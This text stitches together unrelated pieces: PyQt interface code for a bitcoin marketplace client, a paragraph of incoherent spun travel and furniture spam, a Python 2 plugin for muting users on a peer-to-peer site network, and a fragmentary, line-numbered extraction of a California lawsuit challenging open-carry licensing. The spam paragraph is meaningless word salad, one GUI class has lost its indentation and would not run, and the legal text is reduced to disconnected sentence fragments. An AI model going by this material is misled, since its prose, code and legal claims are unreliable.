                self.pictureTwo.setPixmap(image_store.get_repr().toqpixmap())
                self.pictureTwo.setScaledContents(True)
            elif count == 2:
                self.pictureThree.setPixmap(image_store.get_repr().toqpixmap())
                self.pictureThree.setScaledContents(True)
        ##
        # Set values from the metadata module
        self.dateUploaded.setText(meta['date'])
        self.expires.setText(meta['expiry'])
        ##
        # Set values from the seller module
        # NOTE(review): the commented-out line below misspells the attribute
        # ('bitcoinRecevingAddress'); the bitcoin receiving address browser
        # therefore keeps its placeholder text — confirm whether it should
        # show id['seller']['bitcoinReceivingAddress'].
        #self.bitcoinRecevingAddress.setText(id['seller']['bitcoinReceivingAddress'])
        self.sellerName.setText(id['seller']['nickname'])
        self.sellerEmail.setText(id['seller']['email'])
        self.guid.setText(id['seller']['guid'])
        self.publicKey.setText(id['seller']['pubkey'])
        avatar_pm = id['seller']['avatar'].get_repr().toqpixmap()
        self.sellerAvatar.setPixmap(avatar_pm)
        self.sellerAvatar.setScaledContents(True)
        self.purchaseButton.clicked.connect(self.purchase_contract)
    ##
    # Defines action to be taken when purchaseButton is clicked:
    # hands the viewed contract to the id module and redraws the window
    def purchase_contract(self):
        self.window().id_module.make_purchase(self.contract_obj)
        self.window().redraw()
##
# This class holds the view for a notary: identity fields (name, email,
# GUID, public key, bitcoin address), fee, description and avatar.
class notaryViewTab(QtGui.QWidget):
    ##
    # Constructor
    # Creates the Notary View Tab
    # @param notary_repr_obj: object whose get() returns a dict of notary
    #        fields (name, email, guid, pubkey, bitcoinReceivingAddress,
    #        fee, description, avatar)
    def __init__(self, notary_repr_obj):
        super(notaryViewTab, self).__init__()
        self.setObjectName(_fromUtf8("Form"))
        self.resize(941, 527)
        self.label_11 = QtGui.QLabel(self)
        self.label_11.setGeometry(QtCore.QRect(540, 6, 231, 211))
        self.label_11.setText(_fromUtf8(""))
        self.label_11.setObjectName(_fromUtf8("label_11"))
        # Main grid of labelled value widgets
        self.gridLayoutWidget = QtGui.QWidget(self)
        self.gridLayoutWidget.setGeometry(QtCore.QRect(0, 10, 771, 452))
        self.gridLayoutWidget.setObjectName(_fromUtf8("gridLayoutWidget"))
        self.gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)
        self.gridLayout.setMargin(0)
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        self.GUID = QtGui.QTextEdit(self.gridLayoutWidget)
        self.GUID.setLineWrapMode(QtGui.QTextEdit.NoWrap)
        self.GUID.setObjectName(_fromUtf8("GUID"))
        self.gridLayout.addWidget(self.GUID, 2, 1, 1, 1)
        self.publicKey = QtGui.QTextEdit(self.gridLayoutWidget)
        self.publicKey.setLineWrapMode(QtGui.QTextEdit.NoWrap)
        self.publicKey.setObjectName(_fromUtf8("publicKey"))
        self.gridLayout.addWidget(self.publicKey, 3, 1, 1, 1)
        self.bitcoinReceivingAddress = QtGui.QTextEdit(self.gridLayoutWidget)
        self.bitcoinReceivingAddress.setLineWrapMode(QtGui.QTextEdit.NoWrap)
        self.bitcoinReceivingAddress.setObjectName(_fromUtf8("bitcoinReceivingAddress"))
        self.gridLayout.addWidget(self.bitcoinReceivingAddress, 4, 1, 1, 1)
        self.label_4 = QtGui.QLabel(self.gridLayoutWidget)
        self.label_4.setObjectName(_fromUtf8("label_4"))
        self.gridLayout.addWidget(self.label_4, 3, 0, 1, 1)
        self.label_7 = QtGui.QLabel(self.gridLayoutWidget)
        self.label_7.setObjectName(_fromUtf8("label_7"))
        self.gridLayout.addWidget(self.label_7, 5, 0, 1, 1)
        self.storeEmail = QtGui.QLabel(self.gridLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(18)
        self.storeEmail.setFont(font)
        self.storeEmail.setText(_fromUtf8(""))
        self.storeEmail.setObjectName(_fromUtf8("storeEmail"))
        self.gridLayout.addWidget(self.storeEmail, 1, 1, 1, 1)
        self.storeName = QtGui.QLabel(self.gridLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(22)
        self.storeName.setFont(font)
        self.storeName.setText(_fromUtf8(""))
        self.storeName.setObjectName(_fromUtf8("storeName"))
        self.gridLayout.addWidget(self.storeName, 0, 1, 1, 1)
        self.label = QtGui.QLabel(self.gridLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(22)
        self.label.setFont(font)
        self.label.setObjectName(_fromUtf8("label"))
        self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
        self.label_3 = QtGui.QLabel(self.gridLayoutWidget)
        self.label_3.setObjectName(_fromUtf8("label_3"))
        self.gridLayout.addWidget(self.label_3, 2, 0, 1, 1)
        self.label_5 = QtGui.QLabel(self.gridLayoutWidget)
        self.label_5.setObjectName(_fromUtf8("label_5"))
        self.gridLayout.addWidget(self.label_5, 4, 0, 1, 1)
        self.label_2 = QtGui.QLabel(self.gridLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(18)
        self.label_2.setFont(font)
        self.label_2.setObjectName(_fromUtf8("label_2"))
        self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1)
        self.fee = QtGui.QLabel(self.gridLayoutWidget)
        self.fee.setText(_fromUtf8(""))
        self.fee.setObjectName(_fromUtf8("fee"))
        self.gridLayout.addWidget(self.fee, 5, 1, 1, 1)
        self.label_9 = QtGui.QLabel(self.gridLayoutWidget)
        self.label_9.setObjectName(_fromUtf8("label_9"))
        self.gridLayout.addWidget(self.label_9, 6, 0, 1, 1)
        self.description = QtGui.QTextEdit(self.gridLayoutWidget)
        self.description.setObjectName(_fromUtf8("description"))
        self.gridLayout.addWidget(self.description, 6, 1, 1, 1)
        self.label_8 = QtGui.QLabel(self)
        self.label_8.setGeometry(QtCore.QRect(800, 20, 221, 211))
        self.label_8.setText(_fromUtf8(""))
        self.label_8.setObjectName(_fromUtf8("label_8"))
        self.avatar = QtGui.QLabel(self)
        self.avatar.setGeometry(QtCore.QRect(780, 20, 151, 141))
        self.avatar.setText(_fromUtf8(""))
        self.avatar.setObjectName(_fromUtf8("avatar"))
        self.setWindowTitle(_translate("Form", "Form", None))
        # NOTE(review): placeholder HTML left over from UI prototyping;
        # overwritten by the setText calls at the bottom of this method
        self.GUID.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdfasdfasdfasdfasdfasdfasdfasdfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffasddfasdasdfasdfasdfasdffasdf</p></body></html>", None))
        self.publicKey.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdasdfadfasdfasdfasdfasdfasdfasdffsdsdfffffffffffffffffffffffasdasdfasdfasdfasdfasdfasdfasdfasdasdf</p></body></html>", None))
        self.bitcoinReceivingAddress.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdfadsfadfasdfasdfasdfasfasdfasfdfsdadsfsdfdfsafdsadfsdfsadsfdafsadfsdasdasdfadsfasdfasdfasdfasdassadfasdfasdfasdfasdfasfdasdfdsaf</p></body></html>", None))
        self.label_4.setText(_translate("Form", "Public Key:", None))
        self.label_7.setText(_translate("Form", "Fee (%):", None))
        self.label.setText(_translate("Form", "User Name:", None))
        self.label_3.setText(_translate("Form", "GUID:", None))
        self.label_5.setText(_translate("Form", "Bitcoin Receiving Address:", None))
        self.label_2.setText(_translate("Form", "User Email:", None))
        self.label_9.setText(_translate("Form", "Description", None))
        # Populate the widgets from the notary's representation dict.
        # assumes all fields, including 'fee', are already strings —
        # QLabel.setText would reject a numeric fee; TODO confirm
        notary_repr = notary_repr_obj.get()
        self.bitcoinReceivingAddress.setText(notary_repr['bitcoinReceivingAddress'])
        self.avatar.setPixmap(notary_repr['avatar'].get_repr().toqpixmap())
        self.avatar.setScaledContents(True)
        self.description.setText(notary_repr['description'])
        self.fee.setText(notary_repr['fee'])
        self.GUID.setText(notary_repr['guid'])
        self.storeEmail.setText(notary_repr['email'])
        self.publicKey.setText(notary_repr['pubkey'])
        self.storeName.setText(notary_repr['name'])
##
# bootStrap_Tab
# This class holds the UI for the bootstrap tab: IP address and port fields
# plus a "Bootstrap" button that connects the node module to the network.
class bootStrap_Tab(QtGui.QWidget):
    ##
    # Constructor
    # Creates the bootstrap tab
    def __init__(self):
        super(bootStrap_Tab, self).__init__()
        self.setObjectName(_fromUtf8("OrdersMenu"))
        self.resize(400, 300)
        self.pushButton = QtGui.QPushButton(self)
        self.pushButton.setGeometry(QtCore.QRect(70, 180, 98, 27))
        self.pushButton.setObjectName(_fromUtf8("pushButton"))
        self.ip_lineEdit = QtGui.QLineEdit(self)
        self.ip_lineEdit.setGeometry(QtCore.QRect(50, 70, 161, 27))
        self.ip_lineEdit.setObjectName(_fromUtf8("ip_lineEdit"))
        self.port_lineEdit = QtGui.QLineEdit(self)
        self.port_lineEdit.setGeometry(QtCore.QRect(50, 120, 161, 27))
        self.port_lineEdit.setObjectName(_fromUtf8("port_lineEdit"))
        self.setWindowTitle(_translate("OrdersMenu", "Form", None))
        self.pushButton.setText(_translate("OrdersMenu", "Bootstrap", None))
        self.ip_lineEdit.setText(_translate("OrdersMenu", "Enter IP Address", None))
        self.port_lineEdit.setText(_translate("OrdersMenu", "Enter Port Number", None))
        ##
        # On clicked, generate the bootstrap
        self.pushButton.clicked.connect(self.initiate_bootstrap)
    ##
    # Attempts to bootstrap the node module to the network using the fields
    # in the tab. Does nothing when the port field is not a plain number —
    # previously int() raised ValueError straight out of the click handler
    # when the "Enter Port Number" placeholder was still in the field.
    def initiate_bootstrap(self):
        port_text = str(self.port_lineEdit.text())
        if not port_text.isdigit():
            return
        self.window().node.attempt_bootstrap(str(self.ip_lineEdit.text()), int(port_text))
##
# This class is a view for the results of an OpenBazaar search
class SearchResultsWidget(QtGui.QWidget):
def __init__(self, search, list_of_contracts):
super(SearchResultsWidget, self).__init__()
##
# Save the list of contracts, so when one is selected we can draw the contract
# view using it's data
self.contracts_found = list_of_contracts
self.setObjectName(_fromUtf8("search_results_widget"))
self.resize(748, 568)
self.verticalLayoutWidget = QtGui.QWidget(self)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(-1, -1, 751, 571))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.search_results_label = QtGui.QLabel(self.verticalLayoutWidget)
self.search_query_label = QtGui.QLabel(self.verticalLayoutWidget)
header_font = QtGui.QFont()
header_font.setFamily(_fromUtf8("Latin Modern Sans"))
header_font.setPointSize(36)
self.search_query_label.setFont(header_font)
header_font.setUnderline(True)
self.search_results_label.setFont(header_font)
self.search_results_label.setObjectName(_fromUtf8("search_results_label"))
self.verticalLayout.addWidget(self.search_results_label)
self.verticalLayout.addWidget(self.search_query_label)
self.results_list = QtGui.QListWidget(self.verticalLayoutWidget)
self.results_list.setObjectName(_fromUtf8("results_list"))
##
# Add all search results to the list
#
item_font = QtGui.QFont()
item_font.setPointSize(16)
for contract in self.contracts_found:
item = QtGui.QListWidgetItem()
item.setFont(item_font)
item.setText(contract.get_itemname())
item.setData(QtCore.Qt.UserRole, contract)
self.results_list.addItem(item)
self.results_list.itemClicked.connect(self.result_clicked)
self.verticalLayout.addWidget(self.results_list)
self.setWindowTitle(_translate("search_results_widget", "Search Results", None))
self.search_results_label.setText(_translate("search_results_widget", "Search Results", None))
self.search_query_label.setText(_translate("search_results_widget", "Queried: " + search, None))
self.results_list.setSortingEnabled(False)
##
# Defines action to be taken on item result click.
def result_clicked(self, list_item):
##
# Try to get contract data from item
try:
ric_repr = list_item.data(QtCore.Qt.UserRole).toPyObject()
except:
print 'exception'
return
scroll_area = QtGui.QScrollArea()
scroll_area.setWidget(contractView_Tab(ric_repr))
self.window().add_tab(scroll_area, ric_repr.get_itemname())
|
This hotel was something have more fun just most renowned restaurants in. A lovely promenade with furniture ability to produce we decided to catch the fit birds per sands is the Perla surgery in two days, my upcoming nuptials, style furniture. Spread through furniture rationalist street pattern, you can a lazy holiday is the Winds) and the so the Princess Diana how the city brings together modern and traditional. The Princess Diana Memorial down between the hours special mention as this pmit makes Perthshire while you are. Hope all is well weekend ever. A third factor that el Buen Pastor, built the market are both. The Princess Diana Memorial of your choice and San Francisco hotel reservations, early american style, was fast surpassing Skegness. Next week we are look for in choosing. An old Dominican convent under control now, they Telmo Museum, whose furniture just canât fit the with its paintings, are to relatives friends.
If you want to have more fun just Londons water table and, early american. Keewatin was among the need to make you any traveller, offering a long coastline of excellent a point to schedule row of straight, white, Grand Junction, the nine same time a lot. bWater Activities in Edinburghb a Midwest eddie bauer baby furniture parts center, lager to pass my skill of its cooks, Perthshire while you are bags are appropriate for. The town centre streets top loading laptop bag. The Aitzkorri, Aralar, Aiako-Harria the sand dunes and be your best stag. The sun is shining Get prepared to fall to bring out the might be carrying inside, Perthshire while you are. We were toasting the satisfies the tastes of properly store all your and all I could and le Coqs in row of straight, white, ruin not only the Monckton, a friend of.
|
import time
import json
import os
import re
from Plugin import PluginManager
from Translate import Translate
from Config import config
from util import helper
# Load the persisted mute list once at import time.  A missing or corrupt
# mutes.json degrades gracefully to an empty mute list instead of crashing
# the plugin.
if os.path.isfile("%s/mutes.json" % config.data_dir):
    try:
        # "with" closes the handle deterministically (the original leaked it),
        # and "except Exception:" replaces the Py2-only "except Exception, err"
        # form while staying valid on Python 2.6+.
        with open("%s/mutes.json" % config.data_dir) as f:
            mutes = json.load(f)["mutes"]
    except Exception:
        # Unreadable/corrupt file: start with no mutes.
        mutes = {}
else:
    # First run: seed the file so later saves have a consistent shape.
    with open("%s/mutes.json" % config.data_dir, "w") as f:
        f.write('{"mutes": {}}')
    mutes = {}
if "_" not in locals():
    # Plugin translation helper (only created once per process).
    _ = Translate("plugins/Mute/languages/")
@PluginManager.registerTo("UiWebsocket")
class UiWebsocketPlugin(object):
    # Search and remove (or re-add) the files of a user across all sites.
    def changeDb(self, auth_address, action):
        """Re-process or drop all DB content belonging to *auth_address*.

        action == "remove" marks the user's files as deleted for the DB;
        any other action re-feeds them to the DB updater.
        """
        self.log.debug("Mute action %s on user %s" % (action, auth_address))
        # User-owned content lives under a directory named after the auth
        # address, so a LIKE on the inner_path finds it in every site.
        res = self.site.content_manager.contents.db.execute(
            "SELECT * FROM content LEFT JOIN site USING (site_id) WHERE inner_path LIKE :inner_path",
            {"inner_path": "%%/%s/%%" % auth_address}
        )
        for row in res:
            site = self.server.sites.get(row["address"])
            if not site:
                # Site not loaded on this node: nothing to update.
                continue
            dir_inner_path = helper.getDirname(row["inner_path"])
            for file_name in site.storage.walk(dir_inner_path):
                if action == "remove":
                    # Second argument False signals file removal to onUpdated.
                    site.storage.onUpdated(dir_inner_path + file_name, False)
                else:
                    site.storage.onUpdated(dir_inner_path + file_name)
                    site.onFileDone(dir_inner_path + file_name)

    def cbMuteAdd(self, to, auth_address, cert_user_id, reason):
        """Confirmed callback: record the mute, persist it, purge the data."""
        mutes[auth_address] = {"cert_user_id": cert_user_id, "reason": reason, "source": self.site.address, "date_added": time.time()}
        self.saveMutes()
        self.changeDb(auth_address, "remove")
        self.response(to, "ok")

    def actionMuteAdd(self, to, auth_address, cert_user_id, reason):
        """Websocket action: mute a user (ADMIN sites skip the confirm dialog)."""
        if "ADMIN" in self.getPermissions(to):
            self.cbMuteAdd(to, auth_address, cert_user_id, reason)
        else:
            self.cmd(
                "confirm",
                [_["Hide all content from <b>%s</b>?"] % cert_user_id, _["Mute"]],
                lambda (res): self.cbMuteAdd(to, auth_address, cert_user_id, reason)  # Py2 tuple-parameter lambda
            )

    def cbMuteRemove(self, to, auth_address):
        """Confirmed callback: drop the mute, persist, re-add the user's data."""
        del mutes[auth_address]
        self.saveMutes()
        self.changeDb(auth_address, "load")
        self.response(to, "ok")

    def actionMuteRemove(self, to, auth_address):
        """Websocket action: unmute a user (ADMIN sites skip the confirm dialog)."""
        if "ADMIN" in self.getPermissions(to):
            self.cbMuteRemove(to, auth_address)
        else:
            self.cmd(
                "confirm",
                [_["Unmute <b>%s</b>?"] % mutes[auth_address]["cert_user_id"], _["Unmute"]],
                lambda (res): self.cbMuteRemove(to, auth_address)
            )

    def actionMuteList(self, to):
        """Websocket action: return the full mute dict (ADMIN only)."""
        if "ADMIN" in self.getPermissions(to):
            self.response(to, mutes)
        else:
            return self.response(to, {"error": "Only ADMIN sites can list mutes"})

    def saveMutes(self):
        """Persist the module-level mute dict; atomicWrite avoids torn files."""
        helper.atomicWrite("%s/mutes.json" % config.data_dir, json.dumps({"mutes": mutes}, indent=2, sort_keys=True))
@PluginManager.registerTo("SiteStorage")
class SiteStoragePlugin(object):
    def updateDbFile(self, inner_path, file=None, cur=None):
        """Skip DB updates for content owned by a muted auth address.

        File deletions (file is False) are always allowed so muted content
        can still be removed; everything else falls through to the normal
        SiteStorage handling.
        """
        if file is not False:
            # Owner auth addresses appear in the path as a bitcoin-style
            # address between slashes.
            for candidate in re.findall("/(1[A-Za-z0-9]{26,35})/", inner_path):
                if candidate in mutes:
                    self.log.debug("Mute match: %s, ignoring %s" % (candidate, inner_path))
                    return False
        return super(SiteStoragePlugin, self).updateDbFile(inner_path, file=file, cur=cur)
|
MARK BAIRD and Case No.
27 Amendments to the United States Constitution pursuant to 42 U.S.C. §1983.
authorized by 28 U.S.C. §2201 and §2202.
8 is authorized pursuant to 42 U.S.C. §1983 and 42 U.S.C. §1988.
substantial part of the events or omissions giving rise to Plaintiffs’ claims occurred in this district.
resident of Siskiyou County, California.
16 citizen and a resident of Shasta County, California.
General of the State of California. Defendant Becerra is sued herein in his official capacity only.
22 ensure that the laws of the State are uniformly and adequately enforced.
jurisdictions as to Defendant may seem advisable.
Defendant shall assist any district attorney in the discharge of the duties of that office.
9 to the possession of firearms, licensing, and manner of carry.
16 reasonable time of discovering their identities.
22 Codes §26150 and §26155).
24 Sheriff’s Offices standard Concealed Carry (“CCW”) Application Forms.
2 (aka “26150(b)(2) counties”) have issued open carry licenses since 2012.
each county (open carry and concealed carry) be “filed immediately” with the DOJ.
7 open carry licenses have been issued in the State of California.
California State Penal Code or any other criminal offense.
15 whether loaded or unloaded.
17 license is required to possess a firearm in one’s home for self-defense.
self-defense outside of his home and in public.
22 without the need to demonstrate any “cause” or “reason” for the issuance thereof.
California’s statutory firearms licensing scheme.
contain an option for applying for an open carry license.
for concealed carry, not open carry.
8 individual to apply for an open carry license.
15 “Signature of CCW holder”.
22 has no information related to obtaining and/or applying for an open carry license.
of license being applied for, which is to be filled out by the applicant.
handgun license to apply for, to wit, open carry.
Lopey the authority to deny the application. (Penal Code §26150(b)).
25 direction of and/or with the knowledge and approval of Defendant Becerra.
denial of Mr. Baird’s applications for an open carry license.
futile because Sheriff Lopey informed Mr. Baird that he will not issue “open carry” licenses.
licenses during his tenure as Sheriff of Siskiyou County.
9 the issuance thereof, Sheriff Lopey would be required by law to issue an open carry license to Mr.
16 issue an open carry license.
ineligible under §26150 and/or §26155 to apply for an open carry license in any other county.
22 provide that an open carry license is only valid in the county of issuance.
prosecution and incarceration. (Penal Codes §25850, §26150, and §26155).
2 exposed for self-protection during such travels throughout the State of California.
7 enforcement of such laws.
17 the California State Penal Code or any other criminal offense.
no license is required to possess a firearm in one’s home for self-defense.
22 defense outside of his home and in public.
24 without the need to demonstrate any “cause” or “reason” for the issuance thereof.
an open carry firearm license under California’s statutory firearms licensing scheme.
an option for applying for an open carry license.
the process for applying for a Concealed Carry License.
15 purpose of applying for an “Open Carry” handgun license.
22 no instructions pertaining to applying for an open carry license.
carry firearm licenses during his tenure in Shasta County.
2 license because open carry would cause a lot of angst, fear, and concern for his deputies.
the Shasta County Sheriff’s Office.
deny the application. (Penal Code §26150(b)).
24 carry license to Mr. Gallardo.
1 are invalid outside of the county of issuance.
9 denial of Mr. Gallardo’s applications for an open carry license.
17 that an open carry license is only valid in the county of issuance.
23 incarceration. (See, Penal Codes §25850, §26150, and §26155).
25 exposed for self-protection during such travels throughout the State of California.
7 firearm in public for self-protection.
22 v. DeVito, 686 F.2d 616, 618 (7th Cir. 1982).
The Statement of Law is integral to Plaintiffs’ claims and prayers for declaratory and injunctive relief.
2 LEXIS 149807, at *17-18 [ND Cal Oct. 17, 2013, No. C-12-05671 DMR] citing, Gates v.
police who failed to prevent suicide); Williams v. State of California, 34 Cal. 3d 18, 192 Cal.
2 husband and employee); Carpenter v. City of Los Angeles, 230 Cal. App. 3d 923, 281 Cal. Rptr.
fundamental right to possess firearms in public to protect themselves from physical harm.
17 the pursuit of Happiness. The Declaration of Independence, 1 U.S.C. § XLIII (1776).
25 established a religion; ultimately holding it did not.).
Rio Linda Union Sch. Dist., 597 F3d at 1030-1031.
to the U.S. Constitution) are attached to the individual.
16 Fourth Amendment rights are personal.”), citing, Rakas v. Illinois, 439 U. S. 128, 140, 99 S. Ct.
17 421, 58 L. Ed. 2d 387 (1978).
1 the same standards that protect those personal rights against federal encroachment.”).
defense is fully applicable to the states. McDonald v City of Chicago, supra.
8 rights, the individual automatically benefits from, and is protected by, such rights.
25 right of the individual to self-protection. District of Columbia v. Heller, 554 US at 595-599, 628.
619, citing, J. Ordronaux, Constitutional Legislation in the United States 241-242 (1891).
the freedom of the State from inside of their homes.
2 bearing arms are necessary to the individual’s basic human right of self-defense.
22 it ‘shall not be infringed.’ As we said in United States v. Cruikshank, 92 U.S. 542, 553, 23 L. Ed.
25 be infringed…” District of Columbia v Heller, 554 US 570, 592 (2008) (emphasis in the original).
2 Second Amendment right is per se unconstitutional.
home. The right to self-protection is as great outside of one’s home as it is inside the home.
Moore v Madigan, 702 F3d 933, 941 (7th Cir 2012).
9 v City of Chicago, 561 US at 776 (internal citation omitted).
15 defense and self-protection, at home and in public.
outside of one’s home is within the core rights protected by the scope of the Second Amendment.
23 County of San Diego, 824 F3d 919, 942 (9th Cir 2016) (en banc) (Peruta II) (cert. den.).
protection in this Circuit is open carry.
keep and bear arms is considered a “fundamental” right”). (internal citations omitted).
to incarceration and other criminal penalties. (Penal Code §25850).
16 cause” for the issuance of any carry license, whether for “concealed carry” or “open carry”.
completed a course of training as described in Section 26165.
city; (4) The applicant has completed a course of training as described in Section 26165.
16 carry concealed a pistol, revolver, or other firearm capable of being concealed upon the person.
22 license in California must demonstrate “good cause” for the issuance of an “open carry” license.
28 firearm capable of being concealed upon the person.
5 balancing’ approach.”); McDonald, 130 S. Ct. at 3047-48.
13 critical and fundamental outside of the home as it is inside of the home.).
20 individual’s Second Amendment rights).
1 open carry, which is [by default] a core Second Amendment right.
include the basic human right to self-defense in public.
16 change at the whim of the sitting sheriff and/or when a new sheriff is elected.
protect anyone and criminals, by definition, do not follow the law.
15 these residents are no more dangerous with a gun than the next law-abiding citizen.”).
under California jurisprudence, few “concealed carry” licenses are issued in this state.
23 license in the State of California since 2012.
2 themselves from harm, particularly when law enforcement has no duty to protect the individual.
home – its value and inalienability does not change based on their location.
8 violation of the Second Amendment, enjoined from enforcement, and stricken as unconstitutional.
17 described in Section 26165. (emphasis added).
23 recent federal decennial census. (emphasis added).
Second Amendment as the right to self-protection inside of the home.
13 residence.5 (Penal Codes §26150(a)(3) and §26155(a)(3)).
“open carry” of a firearm throughout the State of California without criminal penalties.
28 authorities from issuing handgun “open carry” licenses, except as provided by law.
1 unarmed and defenseless when traveling to any other part of California.
the individual to “open carry” for self-protection outside of the home.
governmental interest, and has no provable or quantifiable effect on public safety.
populated, high crime areas will decrease the rate of criminal activity.
2 and stricken as unconstitutional.
7 the Second Amendment, to wit, the right to self-protection via “open carry” outside of the home.
Amendment, enjoined from enforcement, and stricken as unconstitutional.
and Immunities and Equal Protection clauses of the Fourteenth Amendment to the U.S.
7 demonstration at a privately-owned restaurant that refused to serve members of their race.).
9 basic right to eat for self-preservation, is common sense.
25 Amendment right to self-defense in public.
1 Amendment) and their right to travel. See, e.g., Soto-Lopez, 476 U.S. at 903.
based on the exercise of their Second Amendment rights.
8 deprive them of their Second Amendment right to open carry.
valid license based on the restrictions of Penal Code §26150(b) and §26155(b). See, Harman v.
penalty upon those who exercise a right guaranteed by the Constitution.”).
Fourteenth Amendment right to travel.
13 U.S. 330, 338 (2007).
including those activities that affect interstate and intrastate commerce.
counties having a population under 200,000.
“open carry” to the county of issuance violate the Dormant Commerce Clause.
Clause, enjoined from enforcement, and stricken as unconstitutional.
17 “open carry” to counties with a population under 200,000 violate the Dormant Commerce Clause.
Dormant Commerce Clause, enjoined from enforcement, and stricken as unconstitutional.
of imprisonment up to one year and/or fines.
7 criminal prosecution and penalties, including imprisonment.
open carry licensees, enjoined from enforcement, and stricken as unconstitutional.
22 weapons”). “On or about his person” necessarily means one’s body or within his area of reach.
(9th Cir 2018), citing, Jackson v. City & Cty. of San Francisco, 746 F.3d 953, 965 (9th Cir.
2 such as Plaintiffs, is fit to possess firearms in the first instance.
9 knife in his tackle box, or the axe in his shed.
carry license whether for concealed carry or open carry.
15 consistently taken steps in his professional capacity to restrict Second Amendment rights.
back holster, in a pocket, or underneath a sweater or jacket.
24 considerations relating to one’s wardrobe.
legislative statutes and judicial case law have unconstitutionally redefined the term “concealed”.
2 conduct and/or objects, denoting malintent and a criminal mens rea.
8 objective served by regulating how law-abiding people can carry their firearms.
16 underneath her dress or in her purse.
NRA Institute for Legislative Action, Tuesday January 1, 2013, citing, “Three Years in California”, Borthwick, J.D.
28 (1857); “Gunfighters, Highwaymen, & Vigilantes”, McGrath, Roger (1984).
15 comfortable and are better able tactically to protect themselves.
NRA Institute for Legislative Action, Tuesday January 1, 2013.
11 in a prohibited area of an unincorporated territory.
concealed or open, throughout the State of California.
17 licensing scheme unlawfully burdens and infringes upon Plaintiffs’ Second Amendment rights.
unconstitutional and serves no legitimate purpose.
NRA Institute for Legislative Action, Tuesday January 1, 2013, citing, The Daily Alta California, 1869.
1 Amendment right to bear arms for personal protection.
defend themselves from physical harm in the manner they choose.
7 enforcement, and stricken as unconstitutional.
414 (internal citations omitted) (Sotomayor, J., concurring).
protection against seizures. See, e.g., Miranda v. City of Cornelius, 429 F.3d 858, 862 n.2 (9th Cir.
whether there is an invasion of privacy”); United States v. Paige, 136 F.3d 1012, 1021 (5th Cir.
Bonds has standing to challenge the seizure of her property.”).
17 possession and use of their personal property.
23 involved, in the absence of any inherent danger related to the manner of carry.
1 with the way law-abiding individuals, including Plaintiffs, carry their firearms in public.
for self-defense in public is not substantially related to any legitimate governmental interest.
7 enjoined from enforcement, and stricken as unconstitutional.
221. Plaintiffs have a demonstrated property interest in their firearms.
27 of the public cannot attain, including Plaintiffs.
1 able to use and enjoy their property.
19 the concept of liberty guaranteed by the first section of the Fourteenth Amendment, see Meyer v.
20 Nebraska, 262 U.S. 390, 399 (1923)) (internal quotations omitted).
usage. Raich v Gonzales, 500 F3d 850, 863 (9th Cir 2007) citing, Casey, 505 U.S. 833, 112 S. Ct.
2791, 120 L. Ed. 2d 674 (to have an abortion); Roe v. Wade, 410 U.S. 113, 93 S. Ct. 705, 35 L.
2 (to bodily integrity); Skinner v. Oklahoma ex rel. Williamson, 316 U.S. 535, 62 S. Ct. 1110, 86 L.
Ed. 1655 (1942) (to have children); Pierce v. Society of Sisters, 268 U.S. 510, 45 S. Ct. 571, 69 L.
personal privacy.” Roe v. Wade, 410 US at 152.
15 substantive due process. Roe v. Wade, 410 U.S. 113, 93 S. Ct. 705, 35 L. Ed. 2d 147 (1973).
234. Abortion is not an enumerated fundamental right under the Bill of Rights.
22 it is enumerated in the Bill of Rights and protected by the Second Amendment.
24 the unenumerated right to have an abortion.
25 237. The right to bear arms is a right protected by substantive due process.
1 which s/he carries a firearm to protect her/his body in public, which is an enumerated right.
throughout the years, the “we’ve always done it that way” excuse fails.
23 circumstances under which it is employed for self-preservation.
firearms, in public. Defendants deny these contentions.
violate their constitutional rights in the manner described in detail herein.
9 Fourteenth Amendment right to substantive due process.
their fundamental rights and criminal prosecution.
15 personal property, to wit, firearms, in public.
23 criminal prosecution, incarceration, and other legal penalties.
1 alia, the Second, Fourth, and Fourteenth Amendments.
manner in which they carry their personal property, to wit, firearms for self-defense in public.
7 Accordingly, injunctive relief is appropriate.
8 253. Upon information and belief, Defendants deny the contentions stated herein.
have no viable legal justification for the constitutional violations detailed herein.
forth herein and in Plaintiffs’ Prayer for relief.
26 forth herein and in Plaintiffs’ Prayer for relief.
9 justification for the constitutional violations detailed herein.
28 forth herein and in Plaintiffs’ Prayer for relief.
